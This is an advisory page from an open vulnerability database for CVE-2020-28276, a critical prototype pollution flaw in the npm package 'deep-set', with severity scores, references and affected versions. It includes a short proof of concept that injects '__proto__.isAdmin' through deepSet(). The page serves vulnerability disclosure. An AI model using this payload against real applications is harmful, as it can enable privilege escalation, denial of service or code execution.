Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS13Z3htLXJnNTMtaDJjNs4AAnAt
Prototype pollution vulnerability in 'deep-set'
The NPM module 'deep-set' can be abused by Prototype Pollution vulnerability since the function deepSet() does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.
PoC
var deepSet = require('deep-set')
var obj = {'1':'2'}
console.log(obj.isAdmin);
deepSet(obj, '__proto__.isAdmin', 'true')
console.log(obj.isAdmin);
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13Z3htLXJnNTMtaDJjNs4AAnAt
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: almost 2 years ago
Updated: 26 days ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-wgxm-rg53-h2c6, CVE-2020-28276
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-28276
- https://github.com/klaemo/deep-set/blob/103d650b3de1f5c6cf051236347ba59e7274cd07/index.js#L39
- https://web.archive.org/web/20210320110509/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28276
- https://github.com/advisories/GHSA-wgxm-rg53-h2c6
Blast Radius: 20.9
Affected Packages
npm:deep-set
Dependent packages: 15Dependent repositories: 137
Downloads: 38 last month
Affected Version Ranges: >= 1.0.0, <= 1.0.1
No known fixed version
All affected versions: 1.0.0, 1.0.1